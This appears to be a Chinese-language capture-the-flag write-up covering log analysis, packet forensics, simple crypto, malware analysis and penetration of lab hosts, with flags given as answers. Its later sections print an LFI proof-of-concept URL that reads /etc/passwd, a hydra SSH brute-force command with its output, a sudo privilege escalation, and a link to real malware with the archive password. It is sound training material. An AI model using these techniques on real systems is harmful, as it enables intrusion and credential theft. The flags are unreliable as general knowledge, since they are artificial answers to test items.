-
說明:
- Log 為誘捕系統連線資訊,請分析在此份 log 中,駭客最感興趣的前三名服務。flag為前三名服務 port 號,依序合併後的SHA1加密值(小寫)。
-
範例:
- 前三名服務 [80,5060,21] -> sha1('80506021') -> eeeb577554eeba6a9481f7e0306a514105724fca
-
答案格式:
- flag{port號合併後的SHA1加密值}
-
檔案:
exam1.txt.zip
- Linux Shell
cat exam1.txt | awk '{print $4}'| sort | uniq -c | sort -k 1 -nr | head -387670 168.95.4.5:445 9700 168.95.4.5:1433 3528 168.95.4.5:23 - flag = sha1(445143323)
- flag{0e2c3e4dd79f9a26e591728c8af4e8347403127a}
- 說明:
- Log為誘捕系統連線資訊,請分析在此份log中,攻擊次數最多的IP,flag為IP的SHA1加密值(小寫)
- 答案格式:
- flag{IP的SHA1加密值}
- 檔案:
exam2.txt.zip
- Linux Shell
cat exam2.txt | awk '{print $2}'| sort | uniq -c | sort -k 1 -nr | head -114424 94.102.49.91:42562 - flag = sha1(94.102.49.91)
- flag{ffd04754ddf2b714d0779f4d415530550b4e4b91}
- 說明:
- 此份Log記錄者駭客入系統的軌跡,駭客似乎在某個公共服務中下載惡意程式,裡面藏有flag。
- 答案格式:
- flag{惡意程式裡面藏的flag}
- 檔案:
exam3.txt.zip
- Linux Shell
cat exam3.txt L grep \/\/
- flag{uEXC6fOPQBgJjUL}
- 說明:
- 請分析題目所給網路封包檔案,判斷攻擊者使用了什麼攻擊手法
- 範例:
- CVE-2020-0606
- 答案格式:
- flag{CVE-XXXX-XXXX}
- 檔案:
lab01.pcapng.zip
- 說明:
- 某公司的資料疑似外洩,這期間剛好錄製了相關的網路行為。請嘗試著分析這中間所發生的行為,並嘗試著尋找外洩的機密檔案。
- 答案格式:
- flag{機密檔案內容}
- 檔案:
lab02.pcapng.zip
- 說明:
- 這是某公司的電腦,使用者發現電腦怪怪的,似乎被駭客入侵了。試著分析一下這台電腦發生了什麼事情,請協助找到後門使用來登入的帳號 。
- 答案格式:
- flag{後門登入帳號}
- 檔案:
lab03.pcapng.zip
- 說明:
- 密碼猜猜看,猜對我的密碼就送你Flag ( ^.< )
- 答案格式:
- flag{我的密碼}
- 檔案:
guess.zip
-
from pwn import * r = process("./guess") r.sendline(str(123)) qq = r.recvline() qq = qq.split('is: ') ans = int(qq[1]) r.sendline(str(ans)) r.interactive()- rxms{8ycAkPT1S0ejl7R4}
- Caesar(rxms{8ycAkPT1S0ejl7R4})
- flag{8mqOyDH1G0sxz7F4}
- 說明:
- 1 ~ 1073741824猜一個幸運數字,猜對即可取得Flag
- 答案格式:
- flag{xxxxxxxxxx}
- 檔案:
lucky_number.zip
??? 在程式將使用者輸入資料進行 cmp 時,把兩邊data 改成一樣ㄉ就好惹w
- 說明:
- 這是攻擊者從某台伺服器竊取的shadow檔,請嘗試著幫我把這位使用者的密碼解開來,密碼即是flag
- 答案格式:
- flag{password}
- 檔案:
jack-shadow.zip
??? 爆不出來
- 說明:
- 小文想給巧克力一個寓言故事參考,附件為寓言故事。
- 答案格式:
- flag{xxxxxxxxxx}
- 檔案:
story.txt.zip
-
解壓縮後,將 story.txt Base64 後,擷取部分字串
wcrx{iuLe3Ywfo7G45Kds} -
Caesar(wcrx{iuLe3Ywfo7G45Kds})
flag{rdUn3Hfox7P45Tmb} -
flag{rdUn3Hfox7P45Tmb}
-
VM下載連結: https://pse.is/malware , 解壓縮密碼:malware
-
警告!!! 本題目為真實惡意程式,存在惡意連線行為!!! 請使用者謹慎操作,在斷網隔離環境中進行分析,並關閉防毒軟體防護機制以避免阻擋。
- 說明:
- 請分析名稱為 malware01 的惡意程式,並找出相關行為及計算出 Flag
- 答案格式:
- flag{惡意網域名稱的SHA1值(小寫)}
- 檔案:
malware01.zip
flag = sha1(url) flag{78eb3cfa4aba8060340c0486765160e99e4fa69f}
- 說明:
- 請分析名稱為 malware02 的惡意程式,並找出相關行為及計算出 Flag
- 答案格式:
- flag{實際執行的惡意程式SHA1值(小寫)}
- 檔案:
malware02.zip
- 說明:
- 請分析名稱為malware03的惡意程式,並找出存在於中繼站的Flag
- 答案格式:
- flag{中繼站的Flag}
- 檔案:
malware03.zip
- https://app.any.run/tasks/0cf60ad1-99eb-45a0-83ab-730c3bc3c111
- http://10.100.220.41:8443/
- https://downzen.com/en/windows/gandcrab-v5-1-decryptor/download/
- flag{a3bbc9af09f6acc0d64c3b3fe4becba5c671633d}
- 說明:
- 請尋找存在於此 IP(10.100.229.20) 內的Flag
- 答案格式:
- flag{尋找到的flag}
- 說明:
- 請挑選此IP範圍(10.100.229.24 - 10.100.229.32)內的任何一台弱點主機進行滲透,取得使用者的登入帳號,名稱的開頭好像是flag喔~
- 答案格式:
- flag{username}
-
wpscan
[+] site-editor | Location: http://10.100.229.26/wp-content/plugins/site-editor/ | Latest Version: 1.1.1 (up to date) | Last Updated: 2017-05-02T23:34:00.000Z | | Detected By: Urls In Homepage (Passive Detection) | | [!] 1 vulnerability identified: | | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI) | References: | - https://wpvulndb.com/vulnerabilities/9044 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422 | - https://seclists.org/fulldisclosure/2018/Mar/40 | - https://github.com/SiteEditor/editor/issues/2 | | Version: 1.1.1 (80% confidence) | Detected By: Readme - Stable Tag (Aggressive Detection) | - http://10.100.229.26/wp-content/plugins/site-editor/readme.txt -
Get PoC
-
http:///wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
-
LFI
-
flag{flag95276ca8d6f}
- 說明:
- 請挑選此IP範圍(10.100.229.10 - 10.100.229.19)內的任何一台弱點主機,並找出存在於網站系統內的Flag
- 答案格式:
- flag{主機系統內的flag}
https://www.hackercoolmagazine.com/hacking-easy-file-sharing-http-server-metasploit/
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 3C20-DAF1
Directory of C:\Documents and Settings
04/26/2020 05:50 PM <DIR> .
04/26/2020 05:50 PM <DIR> ..
07/19/2017 07:55 PM <DIR> Administrator
04/26/2020 05:50 PM <DIR> All Users
04/26/2020 07:31 PM <DIR> ec2-user
04/26/2020 05:50 PM <DIR> Files
0 File(s) 0 bytes
6 Dir(s) 81,487,785,984 bytes free
C:\Documents and Settings>cd Files
cd Files
C:\Documents and Settings\Files>dir
dir
Volume in drive C has no label.
Volume Serial Number is 3C20-DAF1
Directory of C:\Documents and Settings\Files
04/26/2020 05:50 PM <DIR> .
04/26/2020 05:50 PM <DIR> ..
04/26/2020 05:50 PM <DIR> Admin
0 File(s) 0 bytes
3 Dir(s) 81,487,785,984 bytes free
C:\Documents and Settings\Files>cd Admin
cd Admin
C:\Documents and Settings\Files\Admin>dir
dir
Volume in drive C has no label.
Volume Serial Number is 3C20-DAF1
Directory of C:\Documents and Settings\Files\Admin
04/26/2020 05:50 PM <DIR> .
04/26/2020 05:50 PM <DIR> ..
04/25/2020 08:03 PM 40 secret.txt
1 File(s) 40 bytes
2 Dir(s) 81,487,785,984 bytes free
C:\Documents and Settings\Files\Admin>dir secret.txt
dir secret.txt
Volume in drive C has no label.
Volume Serial Number is 3C20-DAF1
Directory of C:\Documents and Settings\Files\Admin
04/25/2020 08:03 PM 40 secret.txt
1 File(s) 40 bytes
0 Dir(s) 81,487,785,984 bytes free
C:\Documents and Settings\Files\Admin>type secret.txt
type secret.txt
FLAG{a16bf4ca10e9a63da75d6260d0619f99}
C:\Documents and Settings\Files\Admin>
flag{a16bf4ca10e9a63da75d6260d0619f99}
- 說明:
- 請挑選此IP範圍(10.100.229.10 - 10.100.229.19)內的任何一台弱點主機,並找出存在於郵件系統內的Flag
- 答案格式:
- flag{主機系統內的flag}
??? 迷失在茫茫資料夾中
- 說明:
- 請挑選此IP範圍(10.100.229.34 - 10.100.229.43)內的任何一台弱點主機,入侵後取得家目錄下的flag檔案。
- 答案格式:
- flag{找到的flag}
- 先用 hydya 爆破
hydra -l admin -P ~/tool/fuzzdb/wordlists-user-passwd/rockyou.txt -t 50 ssh://10.100.229.34 (-127) ↵ 16:15:30 Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-30 16:18:02 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 50 tasks per 1 server, overall 50 tasks, 14344398 login tries (l:1/p:14344398), ~286888 tries per task [DATA] attacking ssh://10.100.229.34:22/ [22][ssh] host: 10.100.229.34 login: admin password: 123456 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 26 final worker threads did not complete until end. [ERROR] 26 targets did not resolve or could not be connected [ERROR] 50 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-30 16:18:08 - 用 admin/123456 可以成功登入
admin@ubuntu:~$ ls flag.txt admin@ubuntu:~$ cat flag.txt cbf7a0ffec715232e38aa5b120994bcc - flag{cbf7a0ffec715232e38aa5b120994bcc}
- 說明:
- 請挑選此IP範圍(10.100.229.34 - 10.100.229.43)內的任何一台弱點主機,入侵後取得root家目錄下的flag檔案
- 答案格式:
- flag{找到的flag}
- 先執行 sudo -l 看看
sudo指令能夠執行什麼權限admin@ubuntu:~$ sudo -l [sudo] password for admin: 123456 Matching Defaults entries for admin on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User admin may run the following commands on ubuntu: (ALL) ALL - 發現 sudo 竟然可以執行所有指令,意味著可以直接使用
sudo su提權admin@ubuntu:~$ sudo su root@ubuntu:/home/admin# cd /root root@ubuntu:~# ls flag.txt root@ubuntu:~# cat flag.txt 566b701a1628043018227f28f3ef24d3 - flag{566b701a1628043018227f28f3ef24d3}
- 說明:
- 請找出惡意程式下載連結及常駐於系統的惡意程式
- 答案格式: flag{SHA1(惡意程式下載連結+惡意程式的雜湊值(SHA256))}
- 範例:
SHA1(http://malware.ru+673ca3e002aa0991096c32f6c40f2afb2674ae353ac0e21f692c29c6369e9712) - 檔案:
forensics.vmem
???